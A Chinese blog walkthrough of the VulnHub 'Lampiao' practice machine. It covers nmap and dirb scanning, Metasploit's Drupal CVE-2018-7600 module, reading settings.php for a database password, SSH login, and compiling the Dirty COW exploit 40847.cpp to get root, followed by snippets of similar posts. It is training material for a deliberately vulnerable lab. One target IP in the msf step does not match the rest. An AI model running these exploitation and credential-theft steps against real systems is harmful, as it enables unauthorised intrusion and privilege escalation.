vulnhub-lampiao

最新推荐文章于 2023-08-11 12:37:02 发布
最新推荐文章于 2023-08-11 12:37:02 发布
阅读量80 收藏
点赞数
分类专栏: 漏洞复现 文章标签: linux 服务器 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_45155797/article/details/130003697
版权

lampiao

1.信息收集

nmap -p- 192.168.14.189


dirb http://192.168.14.189:1898 -X ".txt,.php"



发现更新日志文件CHANGLOG.txt

访问更新日志文件CHANGELOG.txt,发现Drupal版本7.54,存在CVE-2018-7600的Drupal漏洞。

2.漏洞利用

msfconsole	#进入msf控制台
search drupal	#搜索drupal的版本漏洞
use 1	#使用攻击模块1
set rhosts 192.168.14.140	#设置目的ip
set rport 1898	#设置目标端口
run	#运行攻击模块


shell
python -c 'import pty;pty.spawn("/bin/bash")'
cat sites/default/settings.php
ls /home


获得数据库密码Virgulino

获得用户名tiago

ssh tiago@192.168.14.189

3.提权

用kali自带的searchsploit来搜索dirty中的漏洞利用代码
searchsploit dirty    
复制一份40847.cpp文件到桌面
cp /usr/share/exploitdb/exploits/linux/local/40847.cpp ./ 
upload /home/kali/Desktop/40847.cpp /tmp	发送40847.cpp到靶机
ls                #查看文件是否存在
#编译、运行dirtycow.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
cat flag.txt      #查看flag.txt文件

注:-Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
-pedantic 允许发出ANSI/ISO C标准所列出的所有警告
-O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
-std=c++11就是用按C++2011标准来编译的 
-pthread 在Linux中要用到多线程时,需要链接pthread库
-o  指定gcc生成的目标文件名




Wh1teSu
关注
专栏目录
Vulnhub系列-Lampiao
Yasso的博客
01-06 3022
靶机:192.168.12.133 kali:192.168.12.128 一、信息搜集 nmap -p- -sV 192.168.12.133 访问80端口 一串乱码(没找到有用的信息) 访问1898端口 Drupal−CMS\color{red}{Drupal-CMS}Drupal−CMS http://192.168.12.133:1898/?q=node/2 audio.m4a qrc.png wget http://192.168.12.133:1898/audio.m4a wget http:
Vulnhub-Lampiao 靶机渗透
Majula
01-30 2329
WalkthroughDownloadDescriptionPen TestingInformation GatheringExploitationReview Download Lampião: 1 ~ VulnHub VM 镜像文件,直接选择 打开虚拟机 即可。 Description Would you like to keep hacking in your own lab? Try this brand new vulnerable machine! “Lampião 1”. Get root!
Vulnhublampiao
qq_45589758的博客
05-15 358
上面得到的Drupal可以通过msf进行搜索,并对其进行利用,这里利用的是一个2018年的漏洞,渗透测试过程中可以多利用几个,注意站内使用的版本是哪一年的,择payload时,要用新的。我发现有的文章是在网站的网页信息中提取疑似可以利用的信息,组成一个字典,使用hydra进行爆破,本人没有尝试,但是这种字典肯定是抽取的关键字越多,越容易爆破出来。在页面存在的其他可点击链接随便点点看看,这里需要注意的是有连个URL是相似的,以node=1和以node=3结尾,这里应该测试node=2或者其他。
[Vulnhub] Lampiao
weixin_63231007的博客
07-03 633
下载链接:Lampião: 1 ~ VulnHub nmap 扫描一下 发现靶机ip:192.168.236.134nmap -A -p 1-65535 192.168.236.134扫一下靶机ip,看看开放了哪些服务: 访问80,没有信息,试试这个1898发现一个登录框,类似于博客 dirb 扫描一下目录 dirb http://192.168.236.134:1898 访问其中的,发现了是Drupal msf--Drupal漏洞利用 msfconsole 查找一下msf中Drupal可以利用的漏洞
VulnHub靶场之Lampiao
A_dmin的博客
10-16 1561
VulnHub靶场之Lampiao 最近事情有点多,但是还是要抽出点时间来学习的!!! 老样子,Lampiao虚拟机先启动,然后再启动kali!! Lampiao虚拟机启动如下,不知账户密码,估摸着和上次那个靶机是差不多的!!!..
vulnhub靶机-Lampiao
臭nana的博客
12-18 425
搭好环境之后,找到靶机的ip,我这里是10.22.102.174,nmap扫描端口,nmap -p- 10.22.102.174 发现80端口,访问一下 再访问一下1898端口,利用谷歌插件wappalyzer发现这个网站是Drupal7 cms 直接上网百度相关漏洞,发现一大堆,其中发现一个CVE-2018-7600 进入kali,打开终端,输入msfconsole,进...
渗透测试实战Vulnhub-Lampiao
weixin_44558065的博客
06-22 1710
目录 一、设计概述 1.1、渗透测试的意义 1.2、渗透测试的目的 二、需求分析 2.1、用户需求分析 2.2、渗透测试 三、方案规划与实施 3.1、信息收集 3.1.1 Nmap扫描 3.1.2 wpscan扫描 3.1.4 webdirscan目录扫描 3.2 漏洞分析 3.2.1 漏洞名称 3.2.2 漏洞概述 3.2.3 漏洞点 3.2.4 漏洞触发流程 3.2.5 漏洞利用 3.2.6 修复意见 3.3 web渗透 一、设计概述 1.1、渗透测试的意义 信息安全等级保护的要求 2015年12月2
vulnhub-lampiao靶机练习
weixin_52451257的博客
11-10 1762
第一步:信息收集 Nmap –sS –p 1-65535 192.168.231.1-255 (靶机使用的是nat模式,和攻击机处于同一网段,所以扫描231.1-255整个网段的地址排除攻击机kali的ip就可以判断出靶机的ip) 我们可以可能到靶机开放了22(ssh),80(http),1898端口, 可以通过dirmap 扫描目录 Python3 dirmap.py –i http:192.168.231.139 –lcf 先访问80端口看一下网站长啥样,有没有可以利...
小白的靶机-VulnHub-Lampiao
wo41ge的博客
12-08 302
靶机地址,看这里 一、信息收集 我们在VM中需要确定攻击目标的IP地址,需要使用nmap获取目标IP地址: 关于nmap的入门操作 nmap -sP 192.168.86.0/24 或者使用netdiscover获取目标IP地址 我们就拿到了这次靶机的IP地址:192.168.86.160 开始探索机器。第一步是找出目标计算机上可用的开放端口和一些服务。因此我在目标计算机上启动了nmap全端口T5速度扫描: nmap -sS -sV -T5 -A -p- 192.168.86.160 目标计算机上
VulnHub--Lampiao-linux脏牛漏洞提权
记录笔记
07-06 1089
vulnhub-靶场--lampiao
vulnhub靶场之Lampiao
weixin_43896364的博客
06-27 169
信息搜集 端口扫描 扫描同网段IP,查找到靶机IP 访问IP地址,页面没有有用的信息 继续扫描,发现开放1898端口 访问1898端口,得到正常页面,发现该页面使用了国外的开源PHP框架Drupal: 在msf中搜索能够利用的EXP,发现2018年的可用: 设置目标地址和端口号之后把exp打过去: 获得根目录权限: 上传脚本并运行,看是否存在SUID或者脏牛提权的可能: 搜索到脏牛提权漏洞: ...
vulnhub-靶机Lampiao
qq_43335965的博客
06-13 47
目标信息:攻击机IP地址:192.1681.10 Lampiao靶机IP地址:192.168.1.12 DC-1靶机IP地址:192.168.1.7 目的:获取靶机root权限和靶机设置的所有flag。 知识点:nmap robots.txt drupal7 cms远程代码执行漏洞(CVE-2018-7600) shell交互 脏牛提权 Python创建简单的HTTP服务 Lampiao 在18...
vulnhub靶场之lampiao
向阳-Y.的博客
02-28 4381
目录1.信息收集2.尝试爆破ssh登录【失败】3.尝试访问网站3.1扫描目录【失败】4.网站系统漏洞【get】5.提权阶段 1.信息收集 首先查看本机网卡网段并来一波存活主机探查,经过排除,锁定了192.168.86.132为靶机 nmap -sP 192.168.86.0/24 接着再对靶机进行一波端口扫描,扫描后的结果如下 nmap -sN -sV -p 1-65535 192.168.86.132 2.尝试爆破ssh登录【失败】 首先使用msfconsole进行ssh登录爆破一波 msfcon
vulnhub打靶--lampiao
m0_52920608的博客
07-18 121
首先是信息搜集,查看到对应drupal版本信息其次利用drupal漏洞getshell最后利用脏牛漏洞提权。
vulnhub--lampiao(脏牛提权)
鲨鱼辣椒的博客
08-03 4809
信息搜集 扫描网段确具体IP地址 扫描IP地址确定开放端口以及服务 浏览器查看网站 查看1898端口,发现另一个网站 扫描网站
【脏牛漏洞】vulnhub-Lampiao
Mr_atopos的博客
06-07 453
利用CVE-2018-7600、脏牛
【渗透测试】VulnHub-Lampiao
m0_52923241的博客
10-26 351
VulnHub-Lampiao渗透VulnHub-Lampiao详细解题步骤知识点总结Linux中查看进程状态信息命令:psCVE-2018-7600——Drupaldirtycow脏牛提权Python SimpleHTTPServer:linux远程下载文件到本地scpftpwgetGCC编译常用工具篇Dirb:Kali Linux下web网站目录爆破工具cewl:密码攻击工具wget:Linux下载文件的工具 VulnHub-Lampiao详细解题步骤 VulnHub-Lampiao详细解题步骤 nma
Vulnhub通关手册》——02 Lampiao
weixin_53801131的博客
12-08 1571
Vulnhub通关手册——02 Lampiao 背景概述: 下载地址为:https://www.vulnhub.com/entry/lampiao-1,249/ 本次的靶机ip为192.168.2.230 1. 信息收集 1.1 扫描目标主机IP 使用nmap进行活跃主机发现,使用命令nmap -sP 192.168.2.0/24,扫描结果如下。 └─$ sudo nmap -sP 192.168.2.0/24 Starting Nmap 7.91 ( https://nmap.org ) at 202
Vulnhub-Lampiao 靶机练习
GloryGod的博客
08-11 119
记录自己的一次靶场尝试,有误地方还请各位大佬指正!
vulnhub-morpheus怎么登录
最新发布
10-14
Vulnhub-Morpheus是一个Linux渗透环境,通常用于网络安全学习和实践。登录Morpheus需要几个步骤: 1. **获取IP地址**:首先你需要访问Vulnhub网站 (https://vulnhub.com/),搜索"Morpheus"找到该渗透实例的详情页,然后获取其公开的IP地址或启动链接。 2. **确定端口**:Morpheus可能运行在标准的SSH端口(通常是22)上,但也可能使用其他非默认端口。查看描述页面以确认使用的端口。 3. **登录尝试**:打开终端,使用`ssh`命令连接到目标IP地址和端口,例如: ``` ssh username@ip_address -p port_number ``` 其中将`username`替换为实例说明文档中给出的用户名,`ip_address`和`port_number`是上面提到的信息。 4. **输入密码**:如果上述命令成功,你可能会被提示输入密码。如果没有提供密码,你可能需要根据挑战或提示去寻找隐藏的密码、密钥文件或其他认证机制。 5. **权限验证**:登录后,可能还需要通过文件系统查找进一步的线索,或者解密文件以获取管理员权限。 如果你遇到登录问题,记得检查网络连接、提供的凭据以及是否有额外的安全措施,比如网络钓鱼陷阱等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Wh1teSu

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值